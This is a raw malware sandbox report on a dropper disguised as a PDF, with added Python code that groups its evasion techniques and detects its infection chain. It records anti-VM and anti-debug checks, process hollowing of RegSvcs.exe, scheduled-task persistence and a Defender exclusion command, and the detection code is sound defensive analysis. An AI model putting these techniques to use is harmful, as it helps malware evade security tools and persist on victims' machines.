      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
      Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwaretray.exey
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") Then
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exe
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe:
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe
      Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exey
      Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exeb
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") ThenYu8
      Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exee
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exel
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe536C7
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exeV
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VBoxTray.exe
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareUser.exeE97637D6
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwaretray.exed
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003FB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BDC642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C17248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003FC030 GetProcessHeap,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C1F3FF BlockInput,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Memory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EF9D5 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Code function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC0D65 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
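The sleep counters, the 922337203685477 ms delays, the foreground-window polling, the AutoIt `ProcessExists`/`DriveSpaceFree` checks and the `IsDebuggerPresent`/`BlockInput` call chains above are raw evidence; grouped by technique they give the sample's evasion profile at a glance. The parser below is an added example (this editor's code, not part of the Joe Sandbox report or its export format): the event-prefix table, the technique labels and the regexes are assumptions, and the sample lines are copied from the report above. It also copes with the raw text export, where the source path runs straight into the event text ("...RegSvcs.exeThread delayed: ...").

```python
"""Group Joe Sandbox evasion-signature lines by technique (added example)."""
import re
from collections import defaultdict

# Text that begins the event half of a "Source: <path or memory region> <event>"
# line.  Assumed list, built from the lines in this report.
EVENT_PREFIXES = (
    "TID:", "Thread delayed:", "Evasive API call chain:", "Last function:",
    "Window / User API:", "API coverage:", "Window found:",
    "Binary or memory string:", "Code function:", "File opened:",
    "API call chain:", "Memory allocated:", "Memory written:", "Process created:",
)

# 922337203685477 ms is INT64_MAX 100-ns ticks expressed in milliseconds, the
# largest relative interval NtDelayExecution takes: an effectively infinite sleep.
INFINITE_SLEEP_MS = (2**63 - 1) // 10_000

SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (\d+) > (\d+)")
DELAY_RE = re.compile(r"delay time: (\d+)")
FOREGROUND_RE = re.compile(r"foregroundWindowGot (\d+)")
ANTI_VM_RE = re.compile(r'ProcessExists\("([^"]+)"\)')


def split_source(line: str):
    """Return (source, event).  Cut at the earliest known event prefix, so the
    fused export form and the ' | ' separated form both work."""
    if "Source:" not in line:
        return "", ""
    body = line.split("Source:", 1)[1].strip()
    cuts = [i for p in EVENT_PREFIXES if (i := body.find(p)) > 0]
    if not cuts:
        return body, ""
    cut = min(cuts)
    return body[:cut].rstrip(" |\t"), body[cut:].strip()


def classify(event: str):
    """Yield (technique, evidence) pairs for one event string."""
    if m := SLEEP_COUNT_RE.search(event):
        yield "sleep-loop", f"{m.group(1)} Sleep calls (threshold {m.group(2)})"
    if m := DELAY_RE.search(event):
        ms = int(m.group(1))
        yield "long-sleep", "infinite (INT64_MAX ticks)" if ms >= INFINITE_SLEEP_MS else f"{ms} ms"
    if m := FOREGROUND_RE.search(event):
        yield "user-interaction-check", f"GetForegroundWindow polled {m.group(1)} times"
    if "GetLocalTime" in event:
        yield "date-check", "GetLocalTime"
    for proc in ANTI_VM_RE.findall(event):        # AutoIt ProcessExists("<vm tool>")
        yield "anti-vm", proc
    if "DriveSpaceFree" in event:                  # tiny/absent D: drive heuristic
        yield "anti-vm", "DriveSpaceFree"
    if "IsDebuggerPresent" in event:
        yield "anti-debug", "IsDebuggerPresent"
    if "fs:[00000030h]" in event:                  # direct PEB read
        yield "anti-debug", "PEB read via fs:[30h]"
    if "BlockInput" in event:
        yield "input-blocking", "BlockInput"


def summarize(lines):
    """technique -> sorted, de-duplicated evidence strings."""
    found = defaultdict(set)
    for line in lines:
        _, event = split_source(line)
        for technique, evidence in classify(event):
            found[technique].add(evidence)
    return {t: sorted(e) for t, e in found.items()}


def sources_for(lines, technique):
    """Which process (file path, or '<process>, <region>' for a dump) produced
    evidence for one technique."""
    return sorted({split_source(l)[0] for l in lines
                   if any(t == technique for t, _ in classify(split_source(l)[1]))})


# Lines copied from the report above (constructed sample input).
SAMPLE = [
    r"Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | TID: 1756 | Thread sleep count: 105 > 30",
    r"Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Evasive API call chain: GetLocalTime,DecisionNodes",
    r"Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Window / User API: foregroundWindowGot 1561",
    r'Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") Then',
    r'Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then',
    r"Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,",
    r"Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Code function: 6_2_00C1F3FF BlockInput,",
]

if __name__ == "__main__":
    for technique, evidence in summarize(SAMPLE).items():
        print(f"{technique:24} {', '.join(evidence)}  <- {', '.join(sources_for(SAMPLE, technique))}")
```

The INT64_MAX check matters in triage: a sleep that long is not a timing delay the sandbox could wait out, it is the injected thread parking itself forever, which is why the report attributes it to `RegSvcs.exe` and `dhcpmon.exe` rather than to the AutoIt stager.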

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
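The process tree above is the whole infection chain in four hops: the dropper runs `wscript.exe` on an encoded `.vbe`, the script host launches `ihgsvw.exe` from `%Temp%`, that AutoIt process starts a copy of `RegSvcs.exe` out of `%Temp%` (the genuine binary lives under `%windir%\Microsoft.NET\Framework\v*`), and the hollowed `RegSvcs.exe` registers the `DHCP Monitor` tasks from XML files in `%Temp%`. The RWX allocation at base `730000` in `RegSvcs.exe` followed by a write that starts with `4D5A` is the PE image going into the host. The rules below are an added example, not Sigma rules and not the sandbox's own logic: the event schema, rule names and heuristics are this editor's assumptions, and the events are reconstructed from the report lines above.

```python
"""Process-chain and injection rules over events reconstructed from the report
lines above (added example; schema and rule names are assumptions)."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ENCODED_SCRIPT_RE = re.compile(r"\.(vbe|jse)\b")
# The genuine RegSvcs.exe ships under %windir%\Microsoft.NET\Framework[64]\v*\.
FRAMEWORK_DIR_RE = re.compile(r"\\microsoft\.net\\framework(64)?\\v", re.I)
TASK_XML_RE = re.compile(r'/xml\s+"?([^"]+)')


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_temp(path: str) -> bool:
    return "\\temp\\" in path.lower()


def process_rules(ev: dict) -> list:
    """(rule, detail) pairs for one process-creation event."""
    hits = []
    img, parent, cmd = image_name(ev["image"]), image_name(ev["parent"]), ev["cmdline"].lower()
    if img in SCRIPT_HOSTS and ENCODED_SCRIPT_RE.search(cmd):
        hits.append(("encoded-script-execution", cmd))
    if parent in SCRIPT_HOSTS and in_temp(ev["image"]):
        hits.append(("script-host-spawns-temp-exe", ev["image"]))
    if img == "regsvcs.exe" and not FRAMEWORK_DIR_RE.search(ev["image"]):
        hits.append(("regsvcs-outside-framework-dir", ev["image"]))
    if img == "schtasks.exe" and "/create" in cmd:
        m = TASK_XML_RE.search(cmd)
        if m and in_temp(m.group(1)):
            hits.append(("schtasks-xml-from-temp", m.group(1).strip()))
    return hits


def injection_rules(events: list) -> list:
    """Pair an executable allocation in a foreign process with a later write of
    an MZ header ("4D5A") to the same base: the hollowing / RunPE pattern."""
    exec_regions, hits = set(), []
    for ev in events:
        key = (ev.get("source"), ev.get("target"), ev.get("base"))
        if ev["type"] == "memory_alloc" and ev["source"] != ev["target"] and "execute" in ev["protect"]:
            exec_regions.add(key)
        elif (ev["type"] == "memory_write" and key in exec_regions
              and ev.get("value_prefix", "").upper().startswith("4D5A")):
            hits.append(("pe-image-written-into-foreign-process",
                         f"{image_name(ev['source'])} -> {image_name(ev['target'])} @ {ev['base']:#x}"))
    return hits


def run(events: list) -> list:
    hits = [h for ev in events if ev["type"] == "process_create" for h in process_rules(ev)]
    return hits + injection_rules(events)


def triggered_rules(events: list) -> list:
    return sorted({rule for rule, _ in run(events)})


# Events reconstructed from the report lines above (constructed sample input).
EVENTS = [
    {"type": "process_create", "parent": r"C:\Users\user\Desktop\004349256789197.pdf.scr.exe",
     "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe'},
    {"type": "process_create", "parent": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx'},
    {"type": "process_create", "parent": r"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe",
     "cmdline": r"C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe"},
    {"type": "process_create", "parent": r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp'},
    {"type": "memory_alloc", "source": r"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe", "base": 0x730000,
     "protect": "page execute and read and write"},
    {"type": "memory_write", "source": r"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe", "base": 0x730000, "value_prefix": "4D5A"},
]

if __name__ == "__main__":
    for rule, detail in run(EVENTS):
        print(f"{rule:40} {detail}")
```

Each rule fires on its own, but the chain is what makes the verdict: a script host spawning from `%Temp%` or a `schtasks /create /xml` from `%Temp%` each has benign look-alikes, while the four of them in one parent-child lineage plus the MZ write into the child do not.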
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9de0fe3ac427d61269f,z}
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c61ef5a7537d61269f[zj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9de03e8ac4574770cjz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c61ef5a7537d61269fyz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c61ef5a7537d61269fhz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4f378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c70ae2a444794b787aaca0877a44687555378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c61ef5a7537d61269fz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175r.ktl<ym
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846da9657f750_51+yz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _y0x3856f9db20eeab5f7c770ab38aea25559365ae7f7e49fae
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: binaryenc61ef5a7537d6ey
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ntunmapviewofsectiond6|y
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: user32.dll61ef5a7537d6sy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ndowprocwjy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sssssseplacee838/////ay
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: execquery\localhost\ro
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sexemodule61ef5a7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: virtualallocex
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: asmrylen
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iswow64process
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dword_ptrde0fe3ac427d6
